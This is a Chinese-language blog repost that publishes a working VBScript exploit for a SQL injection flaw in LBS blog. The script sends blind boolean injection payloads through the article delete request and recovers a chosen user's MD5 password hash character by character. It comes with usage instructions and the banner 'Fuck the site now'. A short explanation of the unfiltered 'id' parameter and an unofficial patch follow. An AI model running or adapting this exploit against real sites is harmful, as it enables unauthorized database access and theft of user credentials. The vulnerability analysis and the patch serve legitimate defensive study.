服务咨询热线:

022-88711099

当前位置:

LBS blog sql注射漏洞(统杀所有版本)

发布时间:2011/11/18 23:02:56 作者:夜风冷 访问量:1177

LBS blog sql注射漏洞(统杀所有版本)

LBS blog sql注射漏洞(统杀所有版本)
    本文发表于3年前
    exp如下
    '============================================================================
    '使用说明:
    ' 在命令提示符下:
    ' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 有效的文章id 要破解的博客用户密码
    '如:
    ' cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
    ' by loveshell.net[B.C.T]
    '============================================================================
    On Error Resume Next
    Dim oArgs
    Dim olbsXML 'XMLHTTP对象用来打开目标网址
    Dim TargetURL '目标网址
    Dim userid,articleid '博客用户名
    Dim TempStr '存放已获取的部分 MD5密码
    Dim CharHex '定义16进制字符
    Dim charset
    Set oArgs = WScript.arguments
    If oArgs.count < 1 Then Call ShowUsage()
    Set olbsXML = createObject("Microsoft.XMLHTTP")
    '补充完整目标网址
    TargetURL = oArgs(0)
    If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
    If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
    TargetURL=TargetURL & "article.asp"
    articleid=oArgs(1)
    userid=oArgs(2)
    TempStr=""
    CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
    WScript.echo "LBS blog All version Exploit"&vbcrlf
    WScript.echo "By 剑心"&vbcrlf
    WScript.echo "http://www.loveshell.net/ Just For fun :)"&vbcrlf&vbcrlf
    WScript.echo "+Fuck the site now"&vbcrlf
    Call main(TargetURL,BlogName)
    Set oBokeXML = Nothing
    '----------------------------------------------sub-------------------------------------------------------
    '============================================
    '函数名称:main
    '函数功能:主程序,注入获得blog 用户密码
    '============================================
    Sub main(TargetURL,BlogName)
    Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
    For MainOffset = 1 To 40
    For SubOffset = 0 To 15
    TempLen = 0
    postdata = ""
    postdata = articleid &" and (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"'"
    OpenURL = TargetURL
    olbsXML.open "Post",OpenURL, False, "", ""
    olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
    olbsXML.send "act=delete&id="& escape(postdata)
    GetPage = BytesToBstr(olbsXML.ResponseBody)
    '判断访问的页面是否存在
    If InStr(GetPage,"deleted")<>0 Then
    '"博客用户不存在或填写的资料有误" 为错误标志 ,返回此标志说明 猜解的 MD5 不正确
    '如果得到 0000000000000000 的 MD5 值,请修改错误标志
    ElseIf InStr(GetPage,"permission")<>0 Then
    TempStr=TempStr & CharHex(SubOffset)
    WScript.Echo "+Crack now:"&TempStr
    Exit for
    Else
    WScript.echo vbcrlf & "Something error" & vbcrlf
    WScript.echo vbcrlf & GetPage& vbcrlf
    WScript.Quit
    End If
    next
    Next
    WScript.Echo vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
    End sub
    '============================================
    '函数名称:BytesToBstr
    '函数功能:将XMLHTTP对象中的内容转化为GB2312编码
    '============================================
    Function BytesToBstr(body)
    dim objstream
    set objstream = createObject("ADODB.Stream")
    objstream.Type = 1
    objstream.Mode =3
    objstream.Open
    objstream.Write body
    objstream.Position = 0
    objstream.Type = 2
    objstream.Charset = "GB2312"
    BytesToBstr = objstream.ReadText
    objstream.Close
    set objstream = nothing
    End Function
    '============================
    '函数名称:ShowUsage
    '函数功能:使用方法提示
    '============================
    Sub ShowUsage()
    WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/剑心"
    WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL BlogName"
    WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1 1"
    WScript.echo ""
    WScript.Quit
    End Sub
    漏洞说明:
    src_article.asp中的
    ......
    input["log_id"]=func.checkInt(input["log_id"]);
    if(!input["id"]){
    strError=lang["invalid_parameter"];
    }else{
    // Check if the article exists
    theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
    strError=false;
    }
    ......
    过滤的是log_id,但是使用的确实id,呵呵 :)
    然后呢?
    class/article.asp中的代码
    this.load = function(strselect, strwhere){
    var tmpA=connBlog.query("select TOP 1 "+strselect+" FROM [blog_Article] where "+strwhere);
    if(tmpA){
    this.fill(tmpA[0]);
    return true;
    }else{
    return false;
    }
    }
    上面不用说了吧,呵呵.不过触发要条件的,看能满足不哦!
    function articledelete(){
    if(theUser.rights["delete"]<1){
    // Check User Right - without DB Query
    pageHeader(lang["error"]);
    redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox");
    }else{
    var theArticle=new lbsArticle();
    var strError;
    默认情况下guest都有删除权限的,尽管后面还做了判断,但是注入已经发生,而我们正好利用他的判断注射,呵呵
    LBS blog sql注射漏洞非官方补丁
    打开:src_article.asp,找到:
    input["log_id"]=func.checkInt(input["log_id"]);
    if(!input["id"]){
    strError=lang["invalid_parameter"];
    }else{
    // Check if the article exists
    theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
    strError=false;
    }
    将其中的 theArticle.load("log_id, log_authorID, log_catID","log_id="+input["id"]);
    修改为: theArticle.load("log_id, log_authorID, log_catID","log_id="+func.checkInt(input["id"])); 即可
    国际惯例,说下此文来源原作者: 脚本小子
    来 源: 互联网
    转载:㊣ 夜 風 冷
    

这篇为批量导入文章,以下为之前站内评论!

  • 夜风冷发表于 3年前